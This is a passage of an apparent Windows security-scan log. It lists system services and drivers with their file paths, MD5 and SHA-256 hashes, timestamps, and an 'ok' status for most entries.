10C193D1ED434A6DC2AD8C450012B9AF1C848A0A0B3B775F13495648FB77E009 ] MEIx64 C:\WINDOWS\system32\DRIVERS\TeeDriverx64.sys 21:27:06.0204 0x0ce4 MEIx64 - ok 21:27:06.0207 0x0ce4 [ 4F708DA590EDBCC124FB79066D44759B, B8DA803299AF5FDE1594CF958EA6B99D4B99E8163438A70A692CA33A96DBF8DE ] MessagingService C:\WINDOWS\System32\MessagingService.dll 21:27:06.0216 0x0ce4 MessagingService - ok 21:27:06.0231 0x0ce4 [ 89257B8D3826B5629CF7F73F97DA44F9, F056D67EC82072BA209FF7942862862FDF562F8C038F3128861C387F8F63B494 ] mlx4_bus C:\WINDOWS\System32\drivers\mlx4_bus.sys 21:27:06.0249 0x0ce4 mlx4_bus - ok 21:27:06.0253 0x0ce4 [ 9AE3C0CC0865B1618A3C97744A6A9E9B, BF72AEF0360AC278B36ED31E5BFC2E8F72136B0952490A105CB6929654C97F6C ] MMCSS C:\WINDOWS\system32\drivers\mmcss.sys 21:27:06.0261 0x0ce4 MMCSS - ok 21:27:06.0264 0x0ce4 [ 0CD29540C32C2E2E0E3D7E9832752AF3, E64C3F5323C59D53409E33E88989FDD2A38B5B602336FC1D8C3702CA9B5EBFC7 ] Modem C:\WINDOWS\system32\drivers\modem.sys 21:27:06.0272 0x0ce4 Modem - ok 21:27:06.0275 0x0ce4 [ 534477FCAFDFCA6B841BFA06BD26BCC5, 96404FDF0BA2127A3BD24319637EC0C8BE8C42618D9FEDF66F41C5F72840D427 ] monitor C:\WINDOWS\System32\drivers\monitor.sys 21:27:06.0282 0x0ce4 monitor - ok 21:27:06.0286 0x0ce4 [ F5D4E18A70BA069D479154442CDEB60D, 96345E88BC6A50415E112A4B4CFDF3F4306EA049741C5B0A2BFFC142F15EB5CB ] mouclass C:\WINDOWS\System32\drivers\mouclass.sys 21:27:06.0291 0x0ce4 mouclass - ok 21:27:06.0294 0x0ce4 [ 5C09868963B0C076AC3BC7759A46B7B1, 64CD200A8D90CDC31317009636A3BB6574ABF04BCAC903F93C47823C40CC03F6 ] mouhid C:\WINDOWS\System32\drivers\mouhid.sys 21:27:06.0302 0x0ce4 mouhid - ok 21:27:06.0306 0x0ce4 [ 8BF7039787036529B98E50AE86A0E46B, 69C04D012D026A14E2D2A138EDA79227F9BE4BE1892D517DCDB797F2A5AEDB14 ] mountmgr C:\WINDOWS\system32\drivers\mountmgr.sys 21:27:06.0312 0x0ce4 mountmgr - ok 21:27:06.0317 0x0ce4 [ 260DB638038D0D9ACCBFCA9F2BF9B692, 68B9454D1E10A5A710AA3F823C7EAF2E8F3DDF5534262AC289BF454FC829B0B7 ] MozillaMaintenance C:\Program Files (x86)\Mozilla Maintenance 
Service\maintenanceservice.exe 21:27:06.0324 0x0ce4 MozillaMaintenance - ok 21:27:06.0328 0x0ce4 [ AD118EC95E9EF4D5223D681D8F183567, 395B76626956F5B7992676B9CA57B2CA075F0CDA881E14B3ED07ABE2DC0EEDBC ] mpsdrv C:\WINDOWS\system32\drivers\mpsdrv.sys 21:27:06.0335 0x0ce4 mpsdrv - ok 21:27:06.0351 0x0ce4 [ FA53A01517BBA97EA3B71CF5CC2052F4, C6F7CBDFAD629B2D4B6ED6A471708E8DBEB5CD5E0A992848359D3C0A82FDFCBE ] MpsSvc C:\WINDOWS\system32\mpssvc.dll 21:27:06.0378 0x0ce4 MpsSvc - ok 21:27:06.0384 0x0ce4 [ D14C297933C82B8CB0B5CBBA4DDC830B, 2EF356F5373F16A7AE2421187FC5C150C09452C835229275B7403181D65C210F ] MRxDAV C:\WINDOWS\system32\drivers\mrxdav.sys 21:27:06.0395 0x0ce4 MRxDAV - ok 21:27:06.0404 0x0ce4 [ F2AD1B72C5A6475FB5FF332E1980DF88, 41E24496FBD61C0A333F567DA7C4E38C5A792724FB56448189099F60114749D5 ] mrxsmb C:\WINDOWS\system32\DRIVERS\mrxsmb.sys 21:27:06.0416 0x0ce4 mrxsmb - ok 21:27:06.0423 0x0ce4 [ 469DD958B1D8CB09E38BE2298B8C398D, 97CCEFF58D8865B0D27C4E16B082C20FA5279CF01A37F47B5F2DA39B334F0667 ] mrxsmb10 C:\WINDOWS\system32\DRIVERS\mrxsmb10.sys 21:27:06.0434 0x0ce4 mrxsmb10 - ok 21:27:06.0440 0x0ce4 [ 1FC4802B593494746B6FE3BDAC25E371, 774CC950B46B3E32603D368D9938BFCF60D2BB3C14C3FE8B03CB1E724AAC29EF ] mrxsmb20 C:\WINDOWS\system32\DRIVERS\mrxsmb20.sys 21:27:06.0449 0x0ce4 mrxsmb20 - ok 21:27:06.0453 0x0ce4 [ BD12E1941A87671A767447B02C6A51A1, 7FCB3077E827639CE23CC2C6FE997A33F7A702D266C0277AF01453B5ACC0966D ] MsBridge C:\WINDOWS\system32\drivers\bridge.sys 21:27:06.0462 0x0ce4 MsBridge - ok 21:27:06.0467 0x0ce4 [ 41C5D9B52F4A1B30C3F7219D601CF12C, E1C1B1CED19D32FA1B765C7C380B9E749893B2018CF358F448E40DA60CB63166 ] MSDTC C:\WINDOWS\System32\msdtc.exe 21:27:06.0478 0x0ce4 MSDTC - ok 21:27:06.0482 0x0ce4 [ 92C00BD9616F353CA59A755C33269757, E67F05A4A1C44137CCAC0C7292A7010B5920172ACAE32638600E231F28F33035 ] Msfs C:\WINDOWS\system32\drivers\Msfs.sys 21:27:06.0489 0x0ce4 Msfs - ok 21:27:06.0492 0x0ce4 [ F27EC8F7A0A779276E5DA2E70C2B01EE, 
A450DB309F84CAFFCE2A720612BDB260D88E9C390D2BC60874D73A55D8567E04 ] msgpiowin32 C:\WINDOWS\System32\drivers\msgpiowin32.sys 21:27:06.0498 0x0ce4 msgpiowin32 - ok 21:27:06.0501 0x0ce4 [ CBA955A54C9446CAAD28C76789D3B071, F6CA1BECA35B13B7CCC9FFB325FACF22713F6B81E8A6540C9967A462E425BBEC ] mshidkmdf C:\WINDOWS\System32\drivers\mshidkmdf.sys 21:27:06.0507 0x0ce4 mshidkmdf - ok 21:27:06.0510 0x0ce4 [ E8E568EF60677E4534F387C53EE1B35F, 2E250EE1A9AE8AFDCA5216BED87328B05713386BD7E61C66A74EF021F2AFE7D7 ] mshidumdf C:\WINDOWS\System32\drivers\mshidumdf.sys 21:27:06.0516 0x0ce4 mshidumdf - ok 21:27:06.0520 0x0ce4 [ 16376B7B0730C04DD1A2C0CC8E09E420, 2F39D3254FD272E277B5496A8C93A7CBFBF80F6004AE0343BE9F09C538975910 ] msisadrv C:\WINDOWS\system32\drivers\msisadrv.sys 21:27:06.0525 0x0ce4 msisadrv - ok 21:27:06.0530 0x0ce4 [ 75FE54E84C1EB0C9C5E09F9FD5928ECC, 971CFEE8FB8364D17CD392E32A32AE57BE6461EAB6C580B52E6D752D4CFDD6B3 ] MSiSCSI C:\WINDOWS\system32\iscsiexe.dll 21:27:06.0540 0x0ce4 MSiSCSI - ok 21:27:06.0542 0x0ce4 msiserver - ok 21:27:06.0545 0x0ce4 [ B26E1C10C8323D2B6ADAF504CD487757, 758DBCDA43D62547ED274D2E09A66B266470C86A89A3BEF387E535DB37A7EA44 ] MSKSSRV C:\WINDOWS\system32\DRIVERS\MSKSSRV.sys 21:27:06.0558 0x0ce4 MSKSSRV - ok 21:27:06.0562 0x0ce4 [ E40B960078A15D4901265D32E071C42D, AC11B8221C8F529FE3CA6FEB99AF699664C86008A732C3A8E6B1CE31C2272454 ] MsLldp C:\WINDOWS\system32\drivers\mslldp.sys 21:27:06.0570 0x0ce4 MsLldp - ok 21:27:06.0573 0x0ce4 [ B4860AB91DC4E73936F0FF504D6B4B07, 7371093D9EB62218D20F6B8B3C88CBF01932AEA2923ED119962A78BE46E5A939 ] MSPCLOCK C:\WINDOWS\system32\DRIVERS\MSPCLOCK.sys 21:27:06.0586 0x0ce4 MSPCLOCK - ok 21:27:06.0589 0x0ce4 [ 8EDC45C3F7F64A51C98B59E24648F74B, 445731F32A37A99FAB3CD5D178A84FB4F835727826211FF18623409D29FF3A1A ] MSPQM C:\WINDOWS\system32\DRIVERS\MSPQM.sys 21:27:06.0602 0x0ce4 MSPQM - ok 21:27:06.0609 0x0ce4 [ 7DA5FAC2A49D30CA5B7B96B8B26281AC, 168C3AA5C7318184D8F67EA832920FCE64E11D4CC418517D7BDACB9632F0BEA8 ] MsRPC 
C:\WINDOWS\system32\drivers\MsRPC.sys 21:27:06.0620 0x0ce4 MsRPC - ok 21:27:06.0626 0x0ce4 [ 4369BBFCDDCCE61856DD862C8E5C4E19, 23BA06675997A3A46723D0FC9E3DFEBC17E4149FC67B9DCED3011BBB5B5DCFF9 ] MsSecFlt C:\WINDOWS\system32\drivers\mssecflt.sys 21:27:06.0635 0x0ce4 MsSecFlt - ok 21:27:06.0638 0x0ce4 [ 7E3365C8BC83DCE88D6226BB5C7170C4, 69D741039CAAFCA93A4CC09CEC14F117527D732A6CF3077AA83E935B03EC3F9C ] mssmbios C:\WINDOWS\System32\drivers\mssmbios.sys 21:27:06.0644 0x0ce4 mssmbios - ok 21:27:06.0646 0x0ce4 [ 09D51564E49181E9928910D6B91C920E, FB3C918820ACF4506AC49478709B4D4C6489BA0B5113E666C34B916CA5CD6DE7 ] MSTEE C:\WINDOWS\system32\DRIVERS\MSTEE.sys 21:27:06.0660 0x0ce4 MSTEE - ok 21:27:06.0662 0x0ce4 [ 793AE56A3946EAD5F906C28D294FEFE6, BB563D088084026606C2FBD30A0850BA18363CC173CC6C77272D727CA6C1F9BD ] MTConfig C:\WINDOWS\System32\drivers\MTConfig.sys 21:27:06.0669 0x0ce4 MTConfig - ok 21:27:06.0674 0x0ce4 [ E35F51C7474A26680627477462715206, 435490915CDD416D666B64C6B4526285EC946E6918CFA85585692B9ED43518B6 ] Mup C:\WINDOWS\system32\Drivers\mup.sys 21:27:06.0681 0x0ce4 Mup - ok 21:27:06.0684 0x0ce4 [ 74BD1149BF50F1E24934042A3BD17C90, DC4626DC4D629CA7DF336EC7E6435F27D2E252D81945E57F4BF2C981DBCD9B45 ] mvumis C:\WINDOWS\system32\drivers\mvumis.sys 21:27:06.0690 0x0ce4 mvumis - ok 21:27:06.0701 0x0ce4 [ 39C772E20B8C61858F969E4D60699D89, 32146D265CD315597C48FB233D77DDACB0FEDDB7E800A0F411A67844BB3ACC67 ] NativeWifiP C:\WINDOWS\system32\DRIVERS\nwifi.sys 21:27:06.0726 0x0ce4 NativeWifiP - ok 21:27:06.0739 0x0ce4 [ BC80F85C129F12A5F64D6741A120B539, AD410F13BCBDE54F98E353BD4DAF30CC5A0A9990FC4F1AB3623EF3175EEBCAF7 ] NaturalAuthentication C:\WINDOWS\System32\NaturalAuth.dll 21:27:06.0767 0x0ce4 NaturalAuthentication - ok 21:27:06.0772 0x0ce4 [ F2EA6F3165E154C24C084AC35DD6C3F8, 4F8CB75770945F5A28CC308917A124109F7462CE933695B9CAA3FE2CAE76C445 ] NcaSvc C:\WINDOWS\System32\ncasvc.dll 21:27:06.0783 0x0ce4 NcaSvc - ok 21:27:06.0790 0x0ce4 [ 9B3C6582CFB91BA2A04B1D06D8E2FB98, 
431E6B075FD24002724E8A2ED9FB3221AD66D1F1D021B56466187D97E5B43A1F ] NcbService C:\WINDOWS\System32\ncbservice.dll 21:27:06.0804 0x0ce4 NcbService - ok 21:27:06.0808 0x0ce4 [ 932E2E43078A3D786A46A5428F21B314, 17F1CC3388D80F1E1850063114C1EB72EEA149D9C8FA3501C0F9EB55C9E0C58D ] NcdAutoSetup C:\WINDOWS\System32\NcdAutoSetup.dll 21:27:06.0820 0x0ce4 NcdAutoSetup - ok 21:27:06.0824 0x0ce4 [ 0FFE8AF1B94C5FD54E6ACC6DAE990D31, B67D3CA3460D4700D8B83EFE4B6A7AA940650E84D985484FBAA1EE80F3632133 ] ndfltr C:\WINDOWS\System32\drivers\ndfltr.sys 21:27:06.0831 0x0ce4 ndfltr - ok 21:27:06.0850 0x0ce4 [ E27876B335FEB441DA511030AA85624D, 6B4FA08463166A2B32F317E6FEDE3C22EB8FFA5B2077955A0B2F2184858BDDE7 ] NDIS C:\WINDOWS\system32\drivers\ndis.sys 21:27:06.0875 0x0ce4 NDIS - ok 21:27:06.0879 0x0ce4 [ 4EA73CFDEE4A628D387D95464A131F29, 38A6E2389FA9B20A7AFDF3CFCD13B66489B92D853EE486BF81019F0A36A142E1 ] NdisCap C:\WINDOWS\system32\drivers\ndiscap.sys 21:27:06.0892 0x0ce4 NdisCap - ok 21:27:06.0897 0x0ce4 [ EB127689AF6F24091AB73538A556257F, BC25067D355084D6893E9262750433044C28893BB27A67BF7AF5008742C6D359 ] NdisImPlatform C:\WINDOWS\system32\drivers\NdisImPlatform.sys 21:27:06.0911 0x0ce4 NdisImPlatform - ok 21:27:06.0914 0x0ce4 [ 73B4C72FB6170A08C64BDA92DE93ECF7, 766BBE659232F0F5EAEE577EE88091FB76175BC52D65B9637126069C97E795D4 ] NdisTapi C:\WINDOWS\system32\DRIVERS\ndistapi.sys 21:27:06.0928 0x0ce4 NdisTapi - ok 21:27:06.0931 0x0ce4 [ 6704F27EB15A5B30AA7FA5A4F4D1FD47, 841F99B3C751F4D4E23C0E7B5C275B4871C1D5EF937A93129DF64DF49F6B6736 ] Ndisuio C:\WINDOWS\system32\drivers\ndisuio.sys 21:27:06.0938 0x0ce4 Ndisuio - ok 21:27:06.0941 0x0ce4 [ FE87CCAA89433FC306A80F15E848F4B2, 3269FDF53DA59057E066D582FCBB96B71C8063B8F488856A9DEA414B4797E43A ] NdisVirtualBus C:\WINDOWS\System32\drivers\NdisVirtualBus.sys 21:27:06.0949 0x0ce4 NdisVirtualBus - ok 21:27:06.0954 0x0ce4 [ 94517BC9F29A1B73D377F1BF1C3DCA34, 45A34D7AAA851C643E80C0F61CBF8544B8A2E8E7DAB2D5AB6F3A34FDEE4AB0B3 ] NdisWan 
C:\WINDOWS\System32\drivers\ndiswan.sys 21:27:06.0971 0x0ce4 NdisWan - ok 21:27:06.0977 0x0ce4 [ 94517BC9F29A1B73D377F1BF1C3DCA34, 45A34D7AAA851C643E80C0F61CBF8544B8A2E8E7DAB2D5AB6F3A34FDEE4AB0B3 ] ndiswanlegacy C:\WINDOWS\system32\DRIVERS\ndiswan.sys 21:27:06.0994 0x0ce4 ndiswanlegacy - ok 21:27:06.0997 0x0ce4 [ AC6AC99075732F5C29DB0004DD5B1AC6, 684EC821EF5C60DA540CA36EC192B09E62440AAD5B13F0F4C23DDC4A9B96F28C ] ndproxy C:\WINDOWS\system32\DRIVERS\NDProxy.sys 21:27:07.0012 0x0ce4 ndproxy - ok 21:27:07.0016 0x0ce4 [ 9AC090451D92E6081EB89CDA83D74189, D4D442412F112853AA8D88DFB5F695AE4E8E2C361905992537EE53BE675FECE8 ] Ndu C:\WINDOWS\system32\drivers\Ndu.sys 21:27:07.0032 0x0ce4 Ndu - ok 21:27:07.0036 0x0ce4 [ A115DDB2C7805C41EEC9A5276FF5764E, FC81D0BE2DAAC6E7161C0FC5C90050022A39AD50E28040D5357C0E1FD6C0B6B5 ] NetAdapterCx C:\WINDOWS\system32\drivers\NetAdapterCx.sys 21:27:07.0045 0x0ce4 NetAdapterCx - ok 21:27:07.0049 0x0ce4 [ F420B6CAB5151A38E4DBBFFB500C11DA, 271F495B261461B8EA847BFDD87C155E6DC1B6236C161B8253A1F023706B1B1D ] NetBIOS C:\WINDOWS\system32\drivers\netbios.sys 21:27:07.0055 0x0ce4 NetBIOS - ok 21:27:07.0062 0x0ce4 [ 30C2F67EC84EB11B22011620107E0325, 98088685F457566FD8D13B83A0BF6B06CDC70AC156B67BF87A8A8446C150C1F3 ] NetBT C:\WINDOWS\system32\DRIVERS\netbt.sys 21:27:07.0076 0x0ce4 NetBT - ok 21:27:07.0079 0x0ce4 [ EABFCDA6E996F8A32DC1B302F7683BB2, 5FF2BA89D9A7BDE78C40866F15EC576527699ADD0F120E1A8388C4404A69F0E8 ] Netlogon C:\WINDOWS\system32\lsass.exe 21:27:07.0086 0x0ce4 Netlogon - ok 21:27:07.0092 0x0ce4 [ D9FF8CA42C3541F4840693F17143C595, B05FB0B6439B34BD93EE59DC48BBE3D712A7428EFBFE37A887CE8546E57EE68F ] Netman C:\WINDOWS\System32\netman.dll 21:27:07.0105 0x0ce4 Netman - ok 21:27:07.0114 0x0ce4 [ 96173660A4DD4A56E4B8938A67DAD9B7, F1D8F94625C6461DB89F8D3BDC73748F8A7F3446694BD1F148AF9BE6F17E9543 ] netprofm C:\WINDOWS\System32\netprofmsvc.dll 21:27:07.0137 0x0ce4 netprofm - ok 21:27:07.0143 0x0ce4 [ 79C810D49E6D2825F51B0D7CAA6E2FAD, 
19B7FB87FC8CE8FEA456F06D32099ED5B69FE38D2954580D4CEC32998D206E9F ] NetSetupSvc C:\WINDOWS\System32\NetSetupSvc.dll 21:27:07.0156 0x0ce4 NetSetupSvc - ok 21:27:07.0162 0x0ce4 [ 4D37150AB4D61598919AB70ACFD1369A, 9ABF73213988ED9AA72B2658F8B91967A24C7CC2049859D86CE9C51A4AB57A84 ] NetTcpPortSharing C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe 21:27:07.0169 0x0ce4 NetTcpPortSharing - ok 21:27:07.0173 0x0ce4 [ 8C03F2F5A9E93AEB08B3AEE51552394A, F95185FB8D5FDEAB39E593488BA6ABCFA9C081BFED05008E0CD95F29B894AFC8 ] netvsc C:\WINDOWS\System32\drivers\netvsc.sys 21:27:07.0181 0x0ce4 netvsc - ok 21:27:07.0191 0x0ce4 [ 0C124EAC0EF7B3767280C94A8C03615B, D10216726A221C8FBC67C47F4B266C271A7C7A4438F77AC44BB561E0A6EB6D34 ] NgcCtnrSvc C:\WINDOWS\System32\NgcCtnrSvc.dll 21:27:07.0209 0x0ce4 NgcCtnrSvc - ok 21:27:07.0225 0x0ce4 [ 6A3DA98447EF49AEB7931ECFBA51AFAD, 9F8E7313E6FD1F46AF22C9C58C877869E73848F459A73F16E0A6AC261BC483DE ] NgcSvc C:\WINDOWS\system32\ngcsvc.dll 21:27:07.0253 0x0ce4 NgcSvc - ok 21:27:07.0261 0x0ce4 [ 50F98CD010326B58F09082BACF3123AE, 124446A2905E23BB3F5763E347842F3F511EC44C37C2F85E409F73EC8F53924E ] NlaSvc C:\WINDOWS\System32\nlasvc.dll 21:27:07.0281 0x0ce4 NlaSvc - ok 21:27:07.0286 0x0ce4 [ EF729C076C2B75B5CB431482DE1E07B3, 834A450F1FDA3615213DC340B5CCFADE326082427CEE3179D32A3C462A1F251F ] NNSALPC C:\WINDOWS\system32\DRIVERS\NNSALPC.sys 21:27:07.0292 0x0ce4 NNSALPC - ok 21:27:07.0297 0x0ce4 [ 0E6EDE400CDDEE1D76CB6B4EF9076130, 2216F3508F3A59E0FF0844F07EC6413A457BD3370B2AA657D8B6D504EE7B8C21 ] NNSHTTP C:\WINDOWS\system32\DRIVERS\NNSHTTP.sys 21:27:07.0305 0x0ce4 NNSHTTP - ok 21:27:07.0309 0x0ce4 [ BA0A6276D2DDCE642D4017AC0E014C54, 983E2F8EE5A8732C5849DC887D4670C91F0AC882E128DCA5B1B3F9A071FF2628 ] NNSHTTPS C:\WINDOWS\system32\DRIVERS\NNSHTTPS.sys 21:27:07.0314 0x0ce4 NNSHTTPS - ok 21:27:07.0319 0x0ce4 [ FB1E93069755A75F8F92FEAD94078362, CD9EE8F217408405BCD41DB197A5447AC35A668E11FE6E2DEFA20D082AC3E44E ] NNSIDS C:\WINDOWS\system32\DRIVERS\NNSIDS.sys 
21:27:07.0325 0x0ce4 NNSIDS - ok 21:27:07.0328 0x0ce4 [ E4B9C6200A8A1213FD29FAF3C42F5F22, 32B21D03BAE08418E5E3B41D7A792378F9915A4AE24C9007B5192E98D480C12B ] NNSNAHSL C:\WINDOWS\system32\DRIVERS\NNSNAHSL.sys 21:27:07.0332 0x0ce4 NNSNAHSL - ok 21:27:07.0337 0x0ce4 [ 8EAF0E189340D0AA6E36FD3DBFCA06E6, 8096A89503BC8AD08CD3F197AD6160C8813B8EC115ABE2FFC42E21F415693A43 ] NNSPICC C:\WINDOWS\system32\DRIVERS\NNSPICC.sys 21:27:07.0342 0x0ce4 NNSPICC - ok 21:27:07.0346 0x0ce4 [ 1AED3FBBFC200384BFDA528E96ACA62F, F3EE27DAFF90376203FB0F1026CF25995026AAD23B624C3075085A1811509A1B ] NNSPIHSW C:\WINDOWS\system32\DRIVERS\NNSPIHSW.sys 21:27:07.0351 0x0ce4 NNSPIHSW - ok 21:27:07.0356 0x0ce4 [ 8E2B94D8ED57BADF66532D48963F5260, A3B928F17726D615080065B3D174438EF989E89693C0C22CDEF902DEE2707047 ] NNSPOP3 C:\WINDOWS\system32\DRIVERS\NNSPOP3.sys 21:27:07.0362 0x0ce4 NNSPOP3 - ok 21:27:07.0369 0x0ce4 [ 51A96D0C6294DE0A44C60173B11B43FD, 5366037D4B8D63C8EF03E3BB68D5FEC04CBB33B5BD10554D8B9533CECCA4753F ] NNSPROT C:\WINDOWS\system32\DRIVERS\NNSPROT.sys 21:27:07.0377 0x0ce4 NNSPROT - ok 21:27:07.0382 0x0ce4 [ 1203E755CE66B47F981A14D683483A46, 6E84597954A0F0A9A50EFCE0431D0A23790410DDFAEC048B5EC86C0F4137D0A3 ] NNSPRV C:\WINDOWS\system32\DRIVERS\NNSPRV.sys 21:27:07.0389 0x0ce4 NNSPRV - ok 21:27:07.0393 0x0ce4 [ 73D22EA5489439A77E7AFF1A476AF4D7, 6B07B76EF0AD2C1886E0AD88CA6501A3EBBEC1AABC8F5B6CEC8DA3E8071BE5BC ] NNSSMTP C:\WINDOWS\system32\DRIVERS\NNSSMTP.sys 21:27:07.0399 0x0ce4 NNSSMTP - ok 21:27:07.0407 0x0ce4 [ FCAA6139267BE6BD579BE63A35D1B09C, 3F023A9C313DE53C9A5425542F4D472C516E4B928EFD33A0118F07149A4643FF ] NNSSTRM C:\WINDOWS\system32\DRIVERS\NNSSTRM.sys 21:27:07.0415 0x0ce4 NNSSTRM - ok 21:27:07.0419 0x0ce4 [ 7913A4658185DB56594E22F1A418D8DD, C4B4C771763F03ADDCC288EBF24D895AB8590101A722BB6010F88062F1681457 ] NNSTLSC C:\WINDOWS\system32\DRIVERS\NNSTLSC.sys 21:27:07.0425 0x0ce4 NNSTLSC - ok 21:27:07.0428 0x0ce4 [ 6D8F6A9C53CFB0C49E8251A442B7283F, 
C3E913E4997C35A9B4C2E613A499F01D15264EAB699B93269B690B2A74A70E9A ] Npfs C:\WINDOWS\system32\drivers\Npfs.sys 21:27:07.0437 0x0ce4 Npfs - ok 21:27:07.0439 0x0ce4 [ BABF7E1757D6908941C9F9CBD66A5EF0, 323E743CB26583763A9C5DE64E7E08138CB8D3E2DE0A8BCE9F774E1C7426E7F8 ] npsvctrig C:\WINDOWS\System32\drivers\npsvctrig.sys 21:27:07.0446 0x0ce4 npsvctrig - ok 21:27:07.0449 0x0ce4 [ A85EB5721C7203AAAAAA04F551960CD9, E61ED728E154799346C749159BFE36FAEB2CE64FC5735F533B910017D66A7EE5 ] nsi C:\WINDOWS\system32\nsisvc.dll 21:27:07.0457 0x0ce4 nsi - ok 21:27:07.0460 0x0ce4 [ 7A6BA778B48DF9FB7AC231D4FF6E3248, 5959CA59C75D2C4DD8A539CAA8D99EF6A0CB5AA3F0D485B14C8B35911748F1F7 ] nsiproxy C:\WINDOWS\system32\drivers\nsiproxy.sys 21:27:07.0467 0x0ce4 nsiproxy - ok 21:27:07.0501 0x0ce4 [ 731FD52461C8107E5B19B9AEDBB82BFB, 51B6722B9B2863B4AE23CE6B1DBD8481DA341748196BD482C6C5F4A6959F24F9 ] NTFS C:\WINDOWS\system32\drivers\NTFS.sys 21:27:07.0542 0x0ce4 NTFS - ok 21:27:07.0548 0x0ce4 [ 4FFB2D5655D10700D5B8E205C4DB86BD, 69078960669A373F9C2D47AF2ED841619831106B681EBAAEAAE5BD569A54CE6D ] Null C:\WINDOWS\system32\drivers\Null.sys 21:27:07.0555 0x0ce4 Null - ok 21:27:07.0559 0x0ce4 [ 99EB6376EC2C03CE5F668577651E3454, A783FFBF89A9074E2074ACAF3F55862DF2F05CAFEAF6A2D509DDA665EB0D59CB ] nvdimmn C:\WINDOWS\System32\drivers\nvdimmn.sys 21:27:07.0567 0x0ce4 nvdimmn - ok 21:27:07.0572 0x0ce4 [ 3DB2E9E207358BFBD09B77B5119ECA5B, 55FED85EFC06B7AB5031D9986E4E4D2FA8841C549081ABBA9F9D9BBAB7852B37 ] nvraid C:\WINDOWS\system32\drivers\nvraid.sys 21:27:07.0580 0x0ce4 nvraid - ok 21:27:07.0588 0x0ce4 [ 4C04BFBD4DB2EECCC47F5FA39D65BB6E, 9312DC4F7000991946D92D87DD9D37D70E336629EDBA553BFC79804049E34B73 ] nvstor C:\WINDOWS\system32\drivers\nvstor.sys 21:27:07.0595 0x0ce4 nvstor - ok 21:27:07.0602 0x0ce4 [ 0D611DC17E48B6F8DD466A089170D118, E55A78E2CC6A0A5F7B8F0B75DFB2297FBC3B959C4FDEFBEA1C6C4E7706724AEB ] OneSyncSvc C:\WINDOWS\System32\APHostService.dll 21:27:07.0622 0x0ce4 OneSyncSvc - ok 21:27:07.0652 0x0ce4 [ 
29B093BA6759118DB14AF41026385E03, 660176D122344A79E52FFD9FE3D32D1967D9B22BC4AD76549D839B09693D0713 ] Origin Client Service C:\Program Files (x86)\Origin\OriginClientService.exe 21:27:07.0683 0x0ce4 Origin Client Service - ok 21:27:07.0692 0x0ce4 [ F5F10CE848CAF07A12A7B92290DBA38A, AC6AC13B692D07A6853B24A6396F1C3388586FD5D528F79FA3E373428D54D29A ] p2pimsvc C:\WINDOWS\system32\pnrpsvc.dll 21:27:07.0706 0x0ce4 p2pimsvc - ok 21:27:07.0714 0x0ce4 [ D1A9C22A98A10EB11A190B8FC7C07C6A, 1DE5F07E707DA9D833F105A8D948BBAEF0172DB2147D9A665EC7320F88D57B9E ] p2psvc C:\WINDOWS\system32\p2psvc.dll 21:27:07.0730 0x0ce4 p2psvc - ok 21:27:07.0734 0x0ce4 [ 2CC6C325B271C7CA60F374F8F868CB45, 569391CA5DF003ED33CAA89FD38834641023C24F7FAE2261F6DA8ABC5CC9C3C9 ] Parport C:\WINDOWS\System32\drivers\parport.sys 21:27:07.0742 0x0ce4 Parport - ok 21:27:07.0747 0x0ce4 [ 664B7DDEE982ADF5EAB480C75B9F6218, 1D1403CBD75916B83EEFA9B235E237583C40025C87C13676247F1EAD3F1D33EE ] partmgr C:\WINDOWS\system32\drivers\partmgr.sys 21:27:07.0754 0x0ce4 partmgr - ok 21:27:07.0763 0x0ce4 [ 72ABB842C15A6C3AC3D954308C6BF206, 8F2A69E3BE43BCD2C8A39153062216B5CCEC9FA62205EC8A23FAB209DFAE7062 ] PcaSvc C:\WINDOWS\System32\pcasvc.dll 21:27:07.0778 0x0ce4 PcaSvc - ok 21:27:07.0785 0x0ce4 [ C5B74C6D87E77BC64DEBD1BF57DEB375, AEBC86E404D4E3985D9FBAD9913AC52127DDE7C79062830717CDFEEA4CD7CC0B ] pci C:\WINDOWS\system32\drivers\pci.sys 21:27:07.0796 0x0ce4 pci - ok 21:27:07.0799 0x0ce4 [ CFB85CB7A6F6926EA0EB96EDFB3C8A91, 7B3A58C165DF231BB202D8A2036272932439864F8EBDC62811E2BEFA8B36FC01 ] pciide C:\WINDOWS\system32\drivers\pciide.sys 21:27:07.0805 0x0ce4 pciide - ok 21:27:07.0809 0x0ce4 [ 13B7D84B397A90E82682C47A15C3A98D, 7F897DA83209381A8C26B34416899E276256AB587DC4E2B60B185CAC8D1877F0 ] pcmcia C:\WINDOWS\system32\drivers\pcmcia.sys 21:27:07.0817 0x0ce4 pcmcia - ok 21:27:07.0820 0x0ce4 [ 76EA512FD9D4673CF7A57775EE8922E2, 6D2B90616A46BC4F9BB6BACBD78EB33C23834987365C87617AFC2E147871C984 ] pcw C:\WINDOWS\system32\drivers\pcw.sys 
21:27:07.0826 0x0ce4 pcw - ok 21:27:07.0830 0x0ce4 [ 4A88D29869609A39782EF53145E6F7CA, 6200E0B96FD0289D7F95779723E3CABBDEE17EDE5F802CC51E5539F475711027 ] pdc C:\WINDOWS\system32\drivers\pdc.sys 21:27:07.0837 0x0ce4 pdc - ok 21:27:07.0849 0x0ce4 [ 4F190BA3C9BD2F0277BCBF480F396091, F09613C76350706992B39D7EA9B859D28F00790E5AC17CA7D49C3E270B9D8994 ] PEAUTH C:\WINDOWS\system32\drivers\peauth.sys 21:27:07.0877 0x0ce4 PEAUTH - ok 21:27:07.0906 0x0ce4 [ F5C8E47E2F7B72ACEA49F7AD2EA60D3B, 184B5C91BF36A03257A38E8FB5FDBEF96AE88F0F5FF2EEEAE7BFC6CA15CC1602 ] PeerDistSvc C:\WINDOWS\system32\peerdistsvc.dll 21:27:07.0953 0x0ce4 PeerDistSvc - ok 21:27:07.0961 0x0ce4 [ FE52FF97A094609429FEF098EDC6FB08, 6762ED340048AF61B756CB7B576BE2057768FDB677623D01F2A592727C0E5A00 ] percsas2i C:\WINDOWS\system32\drivers\percsas2i.sys 21:27:07.0967 0x0ce4 percsas2i - ok 21:27:07.0970 0x0ce4 [ FCA143274792F12383C35902E801E83A, 87D93226E32153794993035553C9935D07242631E182460D8ED13650175C0F01 ] percsas3i C:\WINDOWS\system32\drivers\percsas3i.sys 21:27:07.0977 0x0ce4 percsas3i - ok 21:27:07.0988 0x0ce4 [ 4DAD2C73778D41F951B33854936E7BDC, 1421FDA2D083D5923422A038C54603BF798C48DDB7244DBEDA46D537B8CE1534 ] PerfHost C:\WINDOWS\SysWow64\perfhost.exe 21:27:07.0996 0x0ce4 PerfHost - ok 21:27:08.0016 